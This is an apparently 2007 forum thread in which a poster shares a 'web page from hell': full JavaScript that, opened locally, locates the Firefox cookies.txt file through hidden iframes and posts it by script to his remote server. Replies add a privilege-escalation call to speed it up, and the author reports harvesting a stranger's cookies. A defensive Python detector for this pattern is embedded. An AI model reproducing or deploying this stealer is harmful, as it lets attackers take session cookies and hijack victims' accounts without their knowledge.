My web page from hell
Posted by: bsoric
Date: August 09, 2007 11:10PM

After reading http://www.gnucitizen.org/blog/web-pages-from-hell I wrote an HTML file with JavaScript to find the local user's Firefox cookies.txt file and upload it to my website.

The file is here: http://www.bsoric.com/Files/thief.zip (It's zipped to force the user to download and run it from file:///)

I've tested it on friends' computers with XP and Vista and had it work. I also tested it on my Debian Etch machine, but it wouldn't work, so I removed the file path for Linux systems.

As I'm not great with JavaScript, I used 3 iframes and a form to find the file and upload the contents. Does anyone know of a more efficient way to do this?

Re: My web page from hell
Posted by: bsoric
Date: August 10, 2007 03:43AM

It just occurred to me that people may be a tiny bit hesitant to download and open a webpage which is designed to send away their cookies. So, here's the source:

<html><head>
<title></title>
</head><body>
<script>

function findOS(st) {
var OSes = new Array("file:///C:/Users/","file:///C:/Documents%20and%20Settings/");
try {
document.all.a.src=OSes[st];
findusers(document.all.a,st);
} catch (e) {
findOS(st + 1);
}
}

function findusers(iframe,OS) {
iframe.onload = function() {
var OSappdatas = new Array("/AppData/Roaming/Mozilla/Firefox/Profiles/","/Application%20Data/Mozilla/Firefox/Profiles/");
var content = '';
var username = '';
if (iframe.contentDocument) {
content = iframe.contentDocument.body.innerHTML;
} else if (iframe.contentWindow) {
content = iframe.contentWindow.document.body.innerHTML;
} else if (iframe.document) {
content = iframe.document.body.innerHTML;
}
var users=content.split("a href=\"");
for (var st=2; st<users.length; st++) {
username = users[st].split("\"")[0];
try {
document.all.b.src=iframe.src + username + OSappdatas[OS];
firefox(document.all.b,2);
} catch (e) {
;
}
}
}
}

function firefox(iframe,st) {
iframe.onload = function() {
var content = '';
var prof = '';
if (iframe.contentDocument) {
content = iframe.contentDocument.body.innerHTML;
} else if (iframe.contentWindow) {
content = iframe.contentWindow.document.body.innerHTML;
} else if (iframe.document) {
content = iframe.document.body.innerHTML;
}
var profiles=content.split("a href=\"");
prof = profiles[st].split("\"")[0];
try {
document.all.c.src = iframe.src + prof + "/cookies.txt";
download(document.all.c);
} catch (e) {
firefox(iframe,st + 1);
}
}
}

function download(iframe) {
iframe.onload = function() {
var content = '';
var prof = '';
if (iframe.contentDocument) {
content = iframe.contentDocument.body.innerHTML;
} else if (iframe.contentWindow) {
content = iframe.contentWindow.document.body.innerHTML;
} else if (iframe.document) {
content = iframe.document.body.innerHTML;
}
document.all.f.data.value=content;
document.all.f.s.click();
}
}
</script>
<div style="visibility:hidden">
<iframe id=c src=""></iframe>
<iframe id=b src=""></iframe>
<iframe id=a src=""></iframe>
<form id="f" action="http://www.bsoric.com/abc.php" method="post"><textarea name="data"></textarea><input type="submit" name="s" /></form>
<script>findOS(0);</script>
</div>
</body></html>

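The posted page has a recognisable static footprint: script text that builds file:/// URLs, iframes inside a hidden container, and a form whose action is a remote host and which is submitted by script. The triage script below is an added defensive example (not code from this thread) that flags an HTML file showing that combination, plus the enablePrivilege("UniversalXPConnect") call raised later in the thread; the embedded sample page and its collector.example host are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Behaviours the posted page relies on, expressed as regexes over the markup/script.
FILE_URI = re.compile(r"file:///", re.I)
PRIV = re.compile(r"enablePrivilege\s*\(\s*[\"']UniversalXPConnect", re.I)
AUTOSUBMIT = re.compile(r"\.(click|submit)\s*\(\s*\)")

class _Scan(HTMLParser):
    """Collects iframe count, hidden containers, remote form targets and inline script."""
    def __init__(self):
        super().__init__()
        self.iframes, self.hidden, self.remote_forms, self.script = 0, False, [], []
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            self.iframes += 1
        if tag == "form" and urlparse(a.get("action") or "").netloc:
            self.remote_forms.append(urlparse(a["action"]).netloc)   # absolute target only
        style = (a.get("style") or "").replace(" ", "").lower()
        if "visibility:hidden" in style or "display:none" in style:
            self.hidden = True
        self._in_script = tag == "script"
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.script.append(data)

def triage(html):
    """Return indicator counts and a verdict: suspicious when file:/// reads are combined
    with hidden iframes and a script-submitted form to a remote host, or when the page
    asks for UniversalXPConnect privileges."""
    s = _Scan(); s.feed(html)
    js = "\n".join(s.script)
    ind = {
        "file_uris": len(FILE_URI.findall(html)),
        "hidden_iframes": s.iframes if s.hidden else 0,
        "remote_form_hosts": sorted(set(s.remote_forms)),
        "auto_submit": bool(AUTOSUBMIT.search(js)),
        "xpconnect_privilege": bool(PRIV.search(js)),
    }
    ind["suspicious"] = ind["xpconnect_privilege"] or (
        ind["file_uris"] > 0 and ind["hidden_iframes"] > 0
        and bool(ind["remote_form_hosts"]) and ind["auto_submit"])
    return ind

# Constructed sample mirroring the posted page's structure; the host is a placeholder.
SAMPLE = """<html><body><script>
var OSes = new Array("file:///C:/Users/","file:///C:/Documents%20and%20Settings/");
document.all.f.s.click();</script>
<div style="visibility:hidden"><iframe id=a src=""></iframe>
<form id="f" action="http://collector.example/abc.php" method="post"></form></div>
</body></html>"""
```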
Re: My web page from hell
Posted by: Anonymous User
Date: August 10, 2007 03:50AM

You could use the directory service in Firefox to find the profile folder:

const DIR_SERVICE = new Components.Constructor("@mozilla.org/file/directory_service;1","nsIProperties");
var path = (new DIR_SERVICE()).get("ProfD", Components.interfaces.nsIFile).path;

Or isn't that what you want? Sorry, I didn't have the time to read all the new stuff.

Re: My web page from hell
Posted by: bsoric
Date: August 10, 2007 04:10AM

The error console is giving me "Permission denied to get property UnnamedClass.Constructor" when I try to run that code.

But that is what I want, yes.

Re: My web page from hell
Posted by: Anonymous User
Date: August 10, 2007 04:34AM

Yes, you have to get permission first:

netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");

But that only works locally, but I guess you figured that out.

Re: My web page from hell
Posted by: bsoric
Date: August 10, 2007 05:20AM

Ah, I see. It works (and quicker than my way), but it first shows a "This script is UNSAFE!!!" dialog and makes me wait a few seconds before I can allow it.

Re: My web page from hell
Posted by: Anonymous User
Date: August 10, 2007 06:04AM

Yes, that is correct. But mostly people will click yes if it runs locally since it's "trusted".

To quote Bruce Schneier: People will favor dancing bears over security. ^^

Re: My web page from hell
Posted by: bsoric
Date: August 13, 2007 08:12PM

I just got up, but 3 hours ago someone ran my file from an IP I don't recognise. Being the responsible and totally non-evil person that I am, I'm deleting their cookies from my logs.

IP: 209.26.20.xx | Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 | DATE: Tuesday 14th 2007f August 2007 07:21:16 AM


There's something I never knew: Gmail stores your email address in the cookie.
